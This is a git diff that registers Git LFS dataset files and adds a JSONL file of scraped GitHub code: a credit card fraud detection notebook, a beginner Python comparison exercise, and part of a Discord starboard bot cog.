diff --git a/.gitattributes b/.gitattributes index 709d00e2b763c3f256f453020c70ece7d852a0a9..e98a579988ac632e73baee8cb3b19ce6f9325c3f 100644 --- a/.gitattributes +++ b/.gitattributes @@ -4169,3 +4169,52 @@ saved_model/**/* filter=lfs diff=lfs merge=lfs -text 2792.jsonl filter=lfs diff=lfs merge=lfs -text 2793.jsonl filter=lfs diff=lfs merge=lfs -text 2788.jsonl filter=lfs diff=lfs merge=lfs -text +1448.jsonl filter=lfs diff=lfs merge=lfs -text +283.jsonl filter=lfs diff=lfs merge=lfs -text +2828.jsonl filter=lfs diff=lfs merge=lfs -text +2825.jsonl filter=lfs diff=lfs merge=lfs -text +2823.jsonl filter=lfs diff=lfs merge=lfs -text +2834.jsonl filter=lfs diff=lfs merge=lfs -text +2835.jsonl filter=lfs diff=lfs merge=lfs -text +2830.jsonl filter=lfs diff=lfs merge=lfs -text +2832.jsonl filter=lfs diff=lfs merge=lfs -text +2836.jsonl filter=lfs diff=lfs merge=lfs -text +2839.jsonl filter=lfs diff=lfs merge=lfs -text +2837.jsonl filter=lfs diff=lfs merge=lfs -text +2843.jsonl filter=lfs diff=lfs merge=lfs -text +2840.jsonl filter=lfs diff=lfs merge=lfs -text +2844.jsonl filter=lfs diff=lfs merge=lfs -text +2845.jsonl filter=lfs diff=lfs merge=lfs -text +894.jsonl filter=lfs diff=lfs merge=lfs -text +981.jsonl filter=lfs diff=lfs merge=lfs -text +977.jsonl filter=lfs diff=lfs merge=lfs -text +979.jsonl filter=lfs diff=lfs merge=lfs -text +982.jsonl filter=lfs diff=lfs merge=lfs -text +985.jsonl filter=lfs diff=lfs merge=lfs -text +978.jsonl filter=lfs diff=lfs merge=lfs -text +983.jsonl filter=lfs diff=lfs merge=lfs -text +969.jsonl filter=lfs diff=lfs merge=lfs -text +999.jsonl filter=lfs diff=lfs merge=lfs -text +988.jsonl filter=lfs diff=lfs merge=lfs -text +995.jsonl filter=lfs diff=lfs merge=lfs -text +993.jsonl filter=lfs diff=lfs merge=lfs -text +994.jsonl filter=lfs diff=lfs merge=lfs -text +989.jsonl filter=lfs diff=lfs merge=lfs -text +998.jsonl filter=lfs diff=lfs merge=lfs -text +996.jsonl filter=lfs diff=lfs merge=lfs -text +5522.jsonl filter=lfs diff=lfs merge=lfs -text +553.jsonl filter=lfs diff=lfs merge=lfs -text +5524.jsonl filter=lfs diff=lfs merge=lfs -text +3450.jsonl filter=lfs diff=lfs merge=lfs -text +3453.jsonl filter=lfs diff=lfs merge=lfs -text +3456.jsonl filter=lfs diff=lfs merge=lfs -text +3458.jsonl filter=lfs diff=lfs merge=lfs -text +3457.jsonl filter=lfs diff=lfs merge=lfs -text +3461.jsonl filter=lfs diff=lfs merge=lfs -text +3460.jsonl filter=lfs diff=lfs merge=lfs -text +345.jsonl filter=lfs diff=lfs merge=lfs -text +3422.jsonl filter=lfs diff=lfs merge=lfs -text +3469.jsonl filter=lfs diff=lfs merge=lfs -text +3451.jsonl filter=lfs diff=lfs merge=lfs -text +3471.jsonl filter=lfs diff=lfs merge=lfs -text +3413.jsonl filter=lfs diff=lfs merge=lfs -text diff --git a/1448.jsonl b/1448.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..d170145ffe111e4b6745429f77bfecc8f9db7285 --- /dev/null +++ b/1448.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:70f643df0e42d20fba4c6aba26312fa796e3abf9f43a33cb2338973ff41cd2ac +size 69424991 diff --git a/2823.jsonl b/2823.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..a23192f119ace2b6b7146771f88118a2809935a0 --- /dev/null +++ b/2823.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:c745074c2c62e6ce7c0b42e65f57d671931b823713d76aa72628227fd65c8ecf +size 63955947 diff --git a/2825.jsonl b/2825.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..162104c941016e0100591e76a7f93140bbd8f8cc --- /dev/null +++ b/2825.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:51c2cb08ec47b0db045a5e69b5fdc053f85b6dad925b030e3c2e6a73455c8c66 +size 55846256 diff --git a/2828.jsonl b/2828.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..2cc501db8a2a240980db2238a3ed02c53a871755 --- /dev/null +++ b/2828.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:89b89e37395c1f62a81f91ccb2f9cbe04b37044e946da2d00a246de951cca0c7 +size 24942368 diff --git a/283.jsonl b/283.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..d0cb0bb8c386937699472052f4ad3f83d60ddb08 --- /dev/null +++ b/283.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:896e24ed327501ceb721dee6a905d8f15ba939f16f83192fa3797479517a4f92 +size 55698811 diff --git a/2830.jsonl b/2830.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..87c7ec9de7e356181ca5b2cdf187c148d34b739a --- /dev/null +++ b/2830.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:14972ec8ae8ad1cf3bc3fc6194925c3aa0952efa3c3cc410456c126775e0a2f5 +size 58298205 diff --git a/2832.jsonl b/2832.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..e6fcac46cdeb3e4204d37a0e78cd2466ad348e47 --- /dev/null +++ b/2832.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:7f12e9dca0d5848ca74de425e531915425fdf26ac7e87f6222a737a08a368afe +size 57976026 diff --git a/2834.jsonl b/2834.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..63c719f241070a52edf09847938cbc4019a11124 --- /dev/null +++ b/2834.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:af977658b53d036d474c5b04607d2b6cf4bd0d960a6874c816497be83ad4b5cb +size 54787304 diff --git a/2835.jsonl b/2835.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..aef296e323359380570819df812f2dd3ef9f54af --- /dev/null +++ b/2835.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:93584fcad1dc143f5f0df8fd193e588267938d762b737873780d8b5398d8e37e +size 58529437 diff --git a/2836.jsonl b/2836.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..06880eca98c89cd07b97a086ef8cb17da14adb91 --- /dev/null +++ b/2836.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:0611c7c589871f0853a96a4c0ccfbda934bb51780ceb6dbe09f29f16d3a93e6d +size 62590607 diff --git a/2837.jsonl b/2837.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..d2e3455b9a7326d8fcd6b146519ee2b3b5e528a7 --- /dev/null +++ b/2837.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:95cc5217b8c01b3868fa445af0fc2a10beef47972238430907f8901049a099e2 +size 67116673 diff --git a/2839.jsonl b/2839.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..8b9b7604b84f50fc7db66f59145de7906adfce6d --- /dev/null +++ b/2839.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:65862bf7cee61e270ed9cf86c51794b3c75c3133f253b11ddfd0689a1c622528 +size 59250756 diff --git a/2840.jsonl b/2840.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..fc4bde617be02994476fe98a213635fdd900207b --- /dev/null +++ b/2840.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:9b9d14c8822a33c6dfe15934d483d5d4e98fb8cc380c27ea715ffa1248fa8158 +size 61275386 diff --git a/2843.jsonl b/2843.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..087171f64e5d5491948c5e073a9c62b36aef66b7 --- /dev/null +++ b/2843.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:8dedc488c883e4e669024a2e74620d1b01a53ea9e6f13f81ff018359e3613be3 +size 56622942 diff --git a/2844.jsonl b/2844.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..725af5cee6e7bcb900778e51ccec4f999897a37e --- /dev/null +++ b/2844.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:bd1ff8c31963a3ca029ccdba1b07f45d3b77be780bd206bf4487e52dc89dab89 +size 65555868 diff --git a/2845.jsonl b/2845.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..329b43b7cd88115ffb483598c9c11884d8e34d74 --- /dev/null +++ b/2845.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:801f2110c95ba97d069b8247a4050fc9571f62a69e01e873a3f8979cb9c537c1 +size 49102166 diff --git a/3413.jsonl b/3413.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..ee9cac8a4a75190e3a6567c2cbd8f0569716e994 --- /dev/null +++ b/3413.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:2cd40771ffdf6454d4d3679471ff79bcc9cf3d01bbee4cdbb599feed6f2af79b +size 18341634 diff --git a/3422.jsonl b/3422.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..22411fa91cbddacaaad522e04eb3803da3a56fe4 --- /dev/null +++ b/3422.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:cddf09ad114ca44916165d104869504ccd2b1a1b0f5f6d3fa674b1b0753dcb33 +size 18657313 diff --git a/345.jsonl b/345.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..816ecd2a9afd167be8335c67fcefdc135b6311b4 --- /dev/null +++ b/345.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:e2587943337fb57435c4961b56320606aa5811e0922769880047adeca4cb118a +size 54990810 diff --git a/3450.jsonl b/3450.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..521c70253c08f6644752823d71c7f0bd3b0cd0bd --- /dev/null +++ b/3450.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:07b680597b25a953ac9cf443af14b6a67e386efac1c8a67597c9677ab7ab6919 +size 56493779 diff --git a/3451.jsonl b/3451.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..20e56ceb0381c3c1a59f3864724812799c7da630 --- /dev/null +++ b/3451.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:de23dcbb7b306d2e59d04fa81842ffbc7289a94f1694d9d662d308eddb618112 +size 66138728 diff --git a/3453.jsonl b/3453.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..6c7e45f2d6d791728a8ee93f74c1a10450b9a1b6 --- /dev/null +++ b/3453.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:a67c77f70ef18122418dee0a65cfa05518caf0ae68285f6b57b269f6242cd53a +size 14868381 diff --git a/3456.jsonl b/3456.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..b38e575734704062b6f15e2dc626fe1368b0c3ea --- /dev/null +++ b/3456.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:e9d417750f8fc5fbd5b23f95ff13b80444803bba79d6018ceb65809e06b76ad0 +size 59074043 diff --git a/3457.jsonl b/3457.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..5eb406aadb1dcf85b7346c9015ae9597daa4c9e6 --- /dev/null +++ b/3457.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:e18a32e158650c9595f7c119d571e7c5a680d7a2ae9e6040724577147148d9df +size 63845062 diff --git a/3458.jsonl b/3458.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..fb247dd490b9b4392734c3b001a63093f850e72e --- /dev/null +++ b/3458.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:b264cf00450649f4847d093377b65d8a4b8fbd00a2bbb50a5ef7e4d956551a75 +size 49173108 diff --git a/3460.jsonl b/3460.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..28035322afa0ea41c5c3a58be64a735fa4ede348 --- /dev/null +++ b/3460.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:b1413255bbb409249ab8d8e091d3f97ffd3234c59745d8b5af17f7f7ed013a44 +size 56490914 diff --git a/3461.jsonl b/3461.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..dd231ef3f8f5a30e6cba16964aac9a994f27c943 --- /dev/null +++ b/3461.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:3b9ae9c0b4be66fd0d033522f6ed0f7f7016ac82c793f468b6f5bbd3505a4e36 +size 55006844 diff --git a/3469.jsonl b/3469.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..e478eb2c0022b6b3cc3b55b2853cf30f0a43eaf9 --- /dev/null +++ b/3469.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:8c063355f8883e30c78daabb290b0ef1c64cc5397a2d87231c2767f8228b87c7 +size 57907863 diff --git a/3471.jsonl b/3471.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..a394d443abab40f4999a6e18d4e9436abb99359f --- /dev/null +++ b/3471.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:ecaa5674f507fa136853661be0002c16f278cd1bf2aa11a025e9f91bec88346a +size 61754463 diff --git a/4024.jsonl b/4024.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..d9fd1533b5f6f5b5779b37d22fd3433240c6b48a --- /dev/null +++ b/4024.jsonl @@ -0,0 +1,384 @@ +{"seq_id":"10044023117","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[31]:\n\n\nimport pandas as pd #To hand with data \nimport numpy as np #To math \nimport seaborn as sns #to visualization\nimport matplotlib.pyplot as plt # to plot the graphs\nimport matplotlib.gridspec as gridspec # to do the grid of plots\nfrom sklearn import preprocessing\nimport warnings\nwarnings.filterwarnings(\"ignore\", category=FutureWarning)\nimport time\n\n\n# In[40]:\n\n\ndf_credit = pd.read_csv(\"creditcard.csv\")\n#looking the how data looks\ndf_credit.head()\n\n\n# In[53]:\n\n\n#Looking the V's features\ncolumns = df_credit.iloc[:,1:29].columns\n\nfrauds = df_credit.Class == 1\nnormals = df_credit.Class == 0\n\ngrid = gridspec.GridSpec(14, 2)\nplt.figure(figsize=(15,20*4))\n\nfor n, col in enumerate(df_credit[columns]):\n ax = plt.subplot(grid[n])\n sns.distplot(df_credit[col][frauds], bins = 50, color='g') #Will receive the \"semi-salmon\" violin\n sns.distplot(df_credit[col][normals], bins = 50, color='r') #Will receive the \"ocean\" color\n ax.set_ylabel('Density')\n ax.set_title(str(col))\n ax.set_xlabel('')\nplt.savefig(\"variablehist.png\")\nplt.show()\n\n\n# In[54]:\n\n\ncolormap = plt.cm.Greens\n\nplt.figure(figsize=(20,16))\n\nsns.heatmap(round(df_credit.corr(),2),linewidths=0.1,vmax=1.0, \n square=True, cmap = colormap, linecolor='white', annot=True)\nplt.savefig(\"correlationplot.png\")\nplt.show()\n\n\n# In[35]:\n\n\nfrom imblearn.over_sampling import SMOTE\nfrom sklearn.model_selection import train_test_split\nfrom collections import Counter\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.metrics import precision_score, recall_score, fbeta_score, confusion_matrix, precision_recall_curve, accuracy_score\nfrom sklearn.ensemble import BaggingClassifier\nfrom sklearn.neighbors import KNeighborsClassifier\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.model_selection import KFold, cross_val_score\nfrom sklearn.model_selection import GridSearchCV\nfrom sklearn.ensemble import GradientBoostingClassifier\n\n\n# In[41]:\n\n\ndf_credit = df_credit.sample(frac=0.2,replace=True, random_state=1212)\nX = df_credit.drop([\"Class\"], axis=1).values #Setting the X to do the split\ny = df_credit[\"Class\"].values # transforming the values in array\n# the function that we will use to better evaluate the model\ndef print_results(headline, true_value, pred):\n print(headline)\n print(\"accuracy: {}\".format(accuracy_score(true_value, pred)))\n print(\"precision: {}\".format(precision_score(true_value, pred)))\n print(\"recall: {}\".format(recall_score(true_value, pred)))\n print(\"f: {}\".format(fbeta_score(true_value, pred, beta=0.5)))\n#Showing the diference before and after the transformation used\nprint(\"normal data distribution: {}\".format(Counter(y)))\nX_smote, y_smote = SMOTE().fit_sample(X, y)\nprint(\"SMOTE data distribution: {}\".format(Counter(y_smote)))\n# splitting data into training and test set\nX_train, X_test_o, y_train, y_test_o = train_test_split(X_smote, y_smote, random_state=2, test_size=0.20)\nX_train_o, X_test, y_train_o, y_test = train_test_split(X_smote, y_smote, random_state=2, test_size=0.20)\n\n\n# In[42]:\n\n\n#RF\n#params of the model\nstart = time.clock()\nparam_grid = {\"max_depth\": [3,5,7],\n \"n_estimators\":[3,5,10],\n \"max_features\": [5,6,7,8]}\n# Creating the classifier\nclassifier = RandomForestClassifier(max_features=3, max_depth=2 ,n_estimators=10, \n random_state=3, criterion='entropy', n_jobs=-1, verbose=1 )\ngrid_search = GridSearchCV(classifier, param_grid=param_grid, cv=5, scoring='accuracy')\ngrid_search.fit(X_train, y_train)\nprint(grid_search.best_score_)\nprint(grid_search.best_params_)\nend = time.clock()\nprint('运行时间:',end - start)\n\n\n# In[43]:\n\n\nrf = RandomForestClassifier(max_features=grid_search.best_params_['max_features'], \n max_depth=grid_search.best_params_['max_depth'] ,\n n_estimators=grid_search.best_params_['n_estimators'],\n random_state=43, \n criterion='entropy', n_jobs=-1, verbose=1)\nrf.fit(X_train, y_train)\nrf_pre = rf.predict(X_test)\nprint(\"Confusion Matrix: \")\nprint(confusion_matrix(y_test, rf_pre))\nprint_results(\"\\nSMOTE + RandomForest classification\", y_test, rf_pre)\n\n\n# In[44]:\n\n\n#Bagging KNN\nstart = time.clock()\nknn = KNeighborsClassifier()\nk_range = list(range(1,10))\nweight_options = ['uniform','distance']\nalgorithm_options = ['auto']\nparam_gridknn = dict(n_neighbors = k_range,weights = weight_options,algorithm=algorithm_options)\n#grid search\ngrid_search = GridSearchCV(knn,param_gridknn,cv=5,scoring='accuracy',verbose=1,n_jobs=-1)\ngrid_search.fit(X_train, y_train)\nprint(grid_search.best_score_)\nprint(grid_search.best_params_)\nend = time.clock()\nprint('运行时间:',end - start)\n\n\n# In[45]:\n\n\nknn = BaggingClassifier(KNeighborsClassifier(n_neighbors=grid_search.best_params_['n_neighbors'],\n weights=grid_search.best_params_['weights'],\n algorithm=grid_search.best_params_['algorithm']),\n max_samples=0.5, max_features=0.5)\nknn.fit(X_train, y_train)\nknn_pre = knn.predict(X_test)\nprint(\"Confusion Matrix: \")\nprint(confusion_matrix(y_test, knn_pre))\nprint_results(\"\\nSMOTE + Bagging KNNclassification\", y_test, knn_pre)\n\n\n# In[46]:\n\n\n#logit\nstart = time.clock()\nparam_grid = {'C': [0.01, 0.1, 1, 10],\n 'penalty':['l1', 'l2']}\n\nlogreg = LogisticRegression(random_state=2)\n\ngrid_search_lr = GridSearchCV(logreg, param_grid=param_grid, scoring='recall', cv=5,n_jobs=-1)\n\ngrid_search_lr.fit(X_train, y_train)\n# The best recall obtained\nprint(grid_search_lr.best_score_)\n#Best parameter on trainning set\nprint(grid_search_lr.best_params_)\nend = time.clock()\nprint('运行时间:',end - start)\n\n\n# In[49]:\n\n\n# Creating the model\nlr = LogisticRegression(C=grid_search_lr.best_params_['C'], penalty=grid_search_lr.best_params_['penalty'])\nlr.fit(X_train, y_train)\nlogit_pre = lr.predict(X_test)\nprint(\"Confusion Matrix: \")\nprint(confusion_matrix(y_test, logit_pre))\nprint_results(\"\\nSMOTE + LogisticRegression\", y_test, logit_pre)\n\n\n# In[50]:\n\n\n#GBDT\nstart = time.clock()\nparameters = {'loss': ['deviance', 'exponential'], \n 'learning_rate': [0.05,0.1,0.2],\n 'n_estimators':[100],\n 'max_depth':[3,5,7,10]}\nclassifier=GradientBoostingClassifier()\ngrid_search = GridSearchCV(estimator = classifier,\n param_grid = parameters,\n scoring = 'accuracy',\n cv = 5,\n n_jobs = -1)\ngrid_search = grid_search.fit(X_train, y_train)\nbest_accuracy = grid_search.best_score_\nprint(\"The best accuracy using gridSearch is\", best_accuracy)\n\nbest_parameters = grid_search.best_params_\nprint(\"The best parameters for using this model is\", best_parameters)\nend = time.clock()\nprint('运行时间:',end - start)\n\n\n# In[51]:\n\n\n# Creating the model \ngbdt = GradientBoostingClassifier(loss=grid_search.best_params_['loss'],\n learning_rate=grid_search.best_params_['learning_rate'],\n n_estimators=grid_search.best_params_['n_estimators'],\n max_depth=grid_search.best_params_['max_depth'])\ngbdt.fit(X_train, y_train)\ngbdt_pre = gbdt.predict(X_test)\nprint(\"Confusion Matrix: \")\nprint(confusion_matrix(y_test, gbdt_pre))\nprint_results(\"\\nSMOTE + GBDT\", y_test, gbdt_pre)\n\n\n# In[87]:\n\n\nfrom sklearn.metrics import roc_curve\nfrom sklearn.metrics import roc_auc_score\n#ROC\nrf_fpr, rf_tpr, rf_thresold = roc_curve(y_test, rf_pre)\nknn_fpr, knn_tpr, knn_threshold = roc_curve(y_test, knn_pre)\nlogit_fpr, logit_tpr, logit_threshold = roc_curve(y_test, logit_pre)\ngbdt_fpr, gbdt_tpr, gbdt_threshold = roc_curve(y_test, gbdt_pre)\n\n\ndef graph_roc_curve_multiple(rf_fpr, rf_tpr, knn_fpr, knn_tpr, logit_fpr, logit_tpr, gbdt_fpr, gbdt_tpr):\n plt.figure(figsize=(16,8))\n plt.title('ROC Curve \\n 4 Classifiers', fontsize=18)\n plt.plot(rf_fpr, rf_tpr, label='Random Forest AUC: {:.4f}'.format(roc_auc_score(y_test, rf_pre)))\n plt.plot(knn_fpr, knn_tpr, label='Bagging kNN AUC: {:.4f}'.format(roc_auc_score(y_test, knn_pre)))\n plt.plot(logit_fpr, logit_tpr, label='Logistic Regression AUC: {:.4f}'.format(roc_auc_score(y_test, logit_pre)))\n plt.plot(gbdt_fpr, gbdt_tpr, label='GBDT AUC: {:.4f}'.format(roc_auc_score(y_test, gbdt_pre)))\n plt.plot([0, 1], [0, 1], 'k--')\n plt.axis([-0.01, 1, 0, 1])\n plt.xlabel('False Positive Rate', fontsize=16)\n plt.ylabel('True Positive Rate', fontsize=16)\n plt.annotate('Minimum ROC Score of 50% \\n (This is the minimum score to get)', xy=(0.5, 0.5), xytext=(0.6, 0.3),\n arrowprops=dict(facecolor='#6E726D', shrink=0.05),\n )\n plt.legend()\n \ngraph_roc_curve_multiple(rf_fpr, rf_tpr, knn_fpr, knn_tpr, logit_fpr, logit_tpr, gbdt_fpr, gbdt_tpr)\nplt.savefig(\"ROC.png\",dpi=400)\nplt.show()\n\n\n# In[85]:\n\n\nX_train = pd.DataFrame(X_train)\nfeatures = X_train.columns\nimportances = rf.feature_importances_\nindices = np.argsort(importances)\nplt.figure(figsize = (10,6))\nplt.title('Feature Importances(Random Forest)')\nplt.barh(range(len(indices)), importances[indices], color='coral', align='center')\nplt.yticks(range(len(indices)), [features[i] for i in indices])\nplt.xlabel('Relative Importance')\nplt.savefig(\"RFimp.png\",dpi=400)\nplt.show()\n\n\n# In[84]:\n\n\nX_train = pd.DataFrame(X_train)\nfeatures = X_train.columns\nimportances = gbdt.feature_importances_\nindices = np.argsort(importances)\nplt.figure(figsize = (10,6))\nplt.title('Feature Importances(GBDT)')\nplt.barh(range(len(indices)), importances[indices], color='g', align='center')\nplt.yticks(range(len(indices)), [features[i] for i in indices])\nplt.xlabel('Relative Importance')\nplt.savefig(\"GBDTimp.png\",dpi=400)\nplt.show()\n\n\n# In[83]:\n\n\nlog_reg_cf = confusion_matrix(y_test, logit_pre)\nkneighbors_cf = confusion_matrix(y_test, knn_pre)\nrf_cf = confusion_matrix(y_test, rf_pre)\ngbdt_cf = confusion_matrix(y_test, gbdt_pre)\n\nfig, ax = plt.subplots(2, 2,figsize=(22,12))\n\n\nsns.heatmap(log_reg_cf, ax=ax[0][0], annot=True, cmap=plt.cm.copper)\nax[0, 0].set_title(\"Logistic Regression \\n Confusion Matrix\", fontsize=14)\nax[0, 0].set_xticklabels(['', ''], fontsize=14, rotation=90)\nax[0, 0].set_yticklabels(['', ''], fontsize=14, rotation=360)\n\nsns.heatmap(kneighbors_cf, ax=ax[0][1], annot=True, cmap=plt.cm.copper)\nax[0][1].set_title(\"KNearsNeighbors \\n Confusion Matrix\", fontsize=14)\nax[0][1].set_xticklabels(['', ''], fontsize=14, rotation=90)\nax[0][1].set_yticklabels(['', ''], fontsize=14, rotation=360)\n\nsns.heatmap(rf_cf, ax=ax[1][0], annot=True, cmap=plt.cm.copper)\nax[1][0].set_title(\"Random Forest \\n Confusion Matrix\", fontsize=14)\nax[1][0].set_xticklabels(['', ''], fontsize=14, rotation=90)\nax[1][0].set_yticklabels(['', ''], fontsize=14, rotation=360)\n\nsns.heatmap(gbdt_cf, ax=ax[1][1], annot=True, cmap=plt.cm.copper)\nax[1][1].set_title(\"GBDT \\n Confusion Matrix\", fontsize=14)\nax[1][1].set_xticklabels(['', ''], fontsize=14, rotation=90)\nax[1][1].set_yticklabels(['', ''], fontsize=14, rotation=360)\n\nplt.savefig(\"cm.png\",dpi=400)\nplt.show()\n\n\n# In[ ]:\n\n\n\n\n","repo_name":"littlechuaner/Credit-Fraud-Detection","sub_path":"CreditFraudDetector.py","file_name":"CreditFraudDetector.py","file_ext":"py","file_size_in_byte":11317,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"14043321506","text":"#We would be using our knowledge abount booleans and comparison to compare the data of two students from a collection of grade submissions.\n\n#We'll kick it off by saving the id, average grade, and recent test score in variables for each of the two student entries.\n\n#Let's start saving the data for the first student entry! Create the variable ID_1 that stores \"#4\"\n\nid_1 = \"#4\"\n\n#Next, let's save the student's average grade by creating the variable AVERAGE_GRADE_1 with the value \"A\".\n\naverage_grade_1 = \"A\"\n\n#Finally, save the student's test with the variable TEST_SCORE_1 and set it to 90.\n\ntest_score_1 = 90\n\n#Let's move onto the next student entry! Like before, create id_2 that stores the value \"#5\".\n\nid_2 = \"#5\"\n\n#Create the variable AVERAGE_GRADE_2 and store the second student's average grade, \"A\".\n\naverage_grade_2 = \"A\"\n\n#Finally, create TEST_SCORE_2, and store the second stident's test score, 70.\n\ntest_score_2 = 70\n\n##Now that we've saved the data for each student entry, we're ready to compare them.\n\n# Next, we'll check for duplicate IDs, compare their average grade, and finally compare their test scores.\n\n#Create a no_duplicates variable that stores the result of the inequality comparison != between ID_! and ID_2.\n\nno_duplicates = id_1 != id_2\n\n#Start displaying the result of the comparison by using print with \"No duplicate entries:\"\n\nprint(\"no_duplicates entries:\")\n\n#Finally, display the value of the no_dupliocates variable.\n\nprint(no_duplicates)\n\n#Next, create the variable same_average and store the result of comparing average_grade_1 and average_grade_2 with ==.\n\nsame_average = average_grade_1 == average_grade_2\n\n#Display the string \"Same average grade:\" and on the next line display the variable same_average.\nprint(\"Same average grade:\")\n\nprint(same_average)\n\n#Next, instead a new variable called higher_score, use > to check if test_score_1 is greater than test_score_2.\n\nhigher_score = test_score_1 > test_score_2\n\n#To finish up, check the result by displaying \"id_1 has a higher score:\" then on the next line, display the variable higher_score.\n\nprint(\"id_1 has a higher score:\")\n\nprint (higher_score)\n\n","repo_name":"AyebakuroOruwori/Python-Kids-Projects","sub_path":"Comparing Dataset Entries-Storing Data in Variables.py","file_name":"Comparing Dataset Entries-Storing Data in Variables.py","file_ext":"py","file_size_in_byte":2145,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"32135699293","text":"import discord\nfrom discord import app_commands\nfrom discord.ext import commands\nimport pymongo\nimport datetime\n\nfrom utils import create_embed, initialize_mongodb\n\nclass Starboard(commands.Cog):\n def __init__(self, bot):\n self.bot = bot\n self.mongo_db = initialize_mongodb()\n\n @commands.Cog.listener()\n async def on_raw_reaction_add(self, payload):\n if not payload.guild_id:\n return\n\n starboard_data = self.mongo_db.starboard.find_one({\"guild_id\": str(payload.guild_id)})\n if not starboard_data:\n return\n\n if str(payload.emoji) != starboard_data[\"emoji\"]:\n return\n\n channel = self.bot.get_channel(payload.channel_id)\n message = await channel.fetch_message(payload.message_id)\n starboard_channel = self.bot.get_channel(int(starboard_data[\"channel_id\"]))\n\n for reaction in message.reactions:\n if str(reaction.emoji) == starboard_data[\"emoji\"] and reaction.count >= starboard_data[\"count\"]:\n starboard_msg_id = starboard_data.get(\"messages\", {}).get(str(message.id))\n embed = discord.Embed(description=message.content, color=discord.Color.gold())\n embed.set_author(name=message.author.name, icon_url=message.author.avatar.url)\n embed.add_field(name=\"Original Message\",\n value=f\"[Jump!](https://discord.com/channels/{message.guild.id}/{message.channel.id}/{message.id})\")\n\n if starboard_msg_id:\n starboard_msg = await starboard_channel.fetch_message(starboard_msg_id)\n if not starboard_msg:\n del starboard_data[\"messages\"][str(message.id)]\n self.mongo_db.starboard.update_one({\"guild_id\": str(payload.guild_id)},\n {\"$set\": starboard_data})\n return\n await starboard_msg.edit(embed=embed)\n else:\n sent_msg = await starboard_channel.send(embed=embed)\n if \"messages\" not in starboard_data:\n starboard_data[\"messages\"] = {}\n starboard_data[\"messages\"][str(message.id)] = sent_msg.id\n self.mongo_db.starboard.update_one({\"guild_id\": str(payload.guild_id)}, {\"$set\": starboard_data})\n 